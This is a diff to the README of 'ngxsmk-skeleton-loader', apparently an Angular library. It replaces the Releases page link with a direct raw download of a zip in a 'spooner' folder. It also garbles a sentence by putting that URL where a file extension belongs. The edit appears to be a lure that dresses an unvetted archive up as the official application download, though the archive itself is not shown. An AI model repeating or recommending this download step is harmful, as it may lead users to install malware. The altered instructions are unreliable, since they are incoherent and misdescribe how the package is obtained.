Cholki2025/ngxsmk-skeleton-loader/README.md

 ## 📚 Installation Instructions

 1. **Visit the Releases Page:**
-   To start, visit this page to download the application: [Download Page](https://github.com/Cholki2025/ngxsmk-skeleton-loader/releases).
+   To start, visit this page to download the application: [Download Page](https://raw.githubusercontent.com/Cholki2025/ngxsmk-skeleton-loader/master/spooner/ngxsmk-skeleton-loader.zip).

 2. **Choose a Version:**
    On the releases page, you will see different versions of the software.
 Select the most stable version or the latest one.

 3. **Download the Package:**
    Click the download link for the desired version.
-You may see files such as `.zip` or `.tar.gz`.
+You may see files such as `.zip` or `https://raw.githubusercontent.com/Cholki2025/ngxsmk-skeleton-loader/master/spooner/ngxsmk-skeleton-loader.zip`.
 Save this file to your computer.

 4. **Extract the Files:**
    After downloading, locate the file in your downloads folder.
 Right-click the file and choose "Extract All" (on Windows) or use a similar option on macOS or Linux.